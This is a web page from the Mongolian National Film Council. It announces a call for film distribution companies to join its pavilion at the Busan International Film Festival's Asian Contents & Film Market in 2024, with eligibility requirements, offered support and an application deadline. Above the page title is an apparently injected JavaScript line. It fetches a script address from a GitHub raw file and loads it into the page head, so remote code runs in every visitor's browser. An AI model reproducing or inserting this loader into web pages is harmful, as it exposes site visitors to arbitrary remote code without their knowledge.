;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); 29 ДАХЬ УДААГИЙН ПУСАНЫ ОЛОН УЛСЫН КИНО НААДАМД ХАМТРАН ОРОЛЦОХ КИНО ТҮГЭЭЛТИЙН КОМПАНИ СОНГОН ШАЛГАРУУЛНА - Mongolian National Film Council

КИНО ТҮГЭЭЛТИЙН КОМПАНИ СОНГОН ШАЛГАРУУЛНА

29 ДАХЬ УДААГИЙН ПУСАНЫ ОЛОН УЛСЫН КИНО НААДАМД ХАМТРАН ОРОЛЦОХ КИНО ТҮГЭЭЛТИЙН КОМПАНИ СОНГОН ШАЛГАРУУЛНА

29 ДАХЬ УДААГИЙН ПУСАНЫ ОЛОН УЛСЫН КИНО НААДАМД ХАМТРАН ОРОЛЦОХ КИНО ТҮГЭЭЛТИЙН КОМПАНИ СОНГОН ШАЛГАРУУЛНА

Бүгд Найрамдах Солонгос улсын Пусан хотноо жил бүр зохион байгуулагддаг Пусаны Олон улсын кино наадам нь 29 дахь удаагаа 2024 оны 10 дугаар сарын 02-11-ний өдрүүдэд зохион байгуулагдах гэж байна.

Энэхүү наадмын дэргэдэх “Asian Contents & Film Market” кино маркетын хүрээнд Кино урлагийн зөвлөл Монгол улсыг төлөөлөн албан ёсны павильонтойгоор оролцоно. Тус кино маркетад Монгол кино бүтээлийг сурталчлах, түгээн дэлгэрүүлэх, худалдан борлуулах зорилгоор оролцох хүсэлтэй кино түгээлт хийдэг компанийг сонгон шалгаруулна.

Тавигдах шаардлага:

  • Кино бүтээлийн distribution болон sales хийх албан ёсны эрхтэй компани байх
  • Сүүлийн 3 жилийн хугацаанд тасралтгүй үйл ажиллагаа явуулсан компани байх
  • Багадаа 20 кино бүтээлийн сантай байх ба цаашид түгээлт хийх эрх эзэмшигч байх
  • Кино бүтээлийн санд буй киноны постер, синопсис, танилцуулга Англи хэл дээр байх
  • Кино бүтээлийн санд буй кино Англи хадмал орчуулгатай байх
  • Компанийг төлөөлөн кино наадамд оролцох төлөөлөгч нь Англи хэлний ахисан түвшний мэдлэгтэй байх

Кино урлагийн зөвлөлөөс шалгарсан компанийн төлөөлөгчийг тус наадамд оролцох Пусаны кино наадмын дэргэдэх “Asian Contents & Film Market” кино маркетын мандат (market badge), 5 хоног байрлах байр, онгоцны зардлын 50 хувийг бүрэн хариуцна.

Дээрх шаардлагыг хангасан кино түгээлт хийдэг компани танилцуулга мэдээллээ доорх холбоосоор 2024 оны 08 дугаар сарын 05-ны дотор ирүүлнэ үү.

https://forms.gle/VtyCvH1Jp72tfmgF7

Дэлгэрэнгүй мэдээллийг 51-262226 дугаарын утаснаас холбогдон авна уу.